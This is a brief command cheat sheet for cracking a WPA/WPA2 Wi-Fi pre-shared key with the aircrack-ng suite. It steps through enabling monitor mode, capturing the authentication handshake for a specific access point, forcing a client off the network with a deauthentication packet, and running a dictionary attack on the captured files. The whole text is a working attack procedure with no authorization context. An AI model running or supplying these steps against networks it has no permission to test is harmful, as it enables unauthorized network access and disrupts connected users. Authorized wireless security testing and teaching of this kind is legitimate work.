- Start the wireless interface in monitor mode
airmon-ng
- Disable the driver
airmon-ng stop wlp1s0
- Enable monitor mode on the wifi0
airmon-ng start wifi0 9
- Enable monitor mode on wlp1s0
airmon-ng start wlp1s0 9
- Start airodump-ng to collect authentication handshake
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk wlp1s0
-c 9 is the channel for the wireless network --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic. -w psk is the file name prefix for the file which will contain the IVs. ath0 is the interface name.
- Use aireplay-ng to deauthenticate the wireless client
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlp1s0
- Run aircrack-ng to crack the pre-shared key
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory. *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.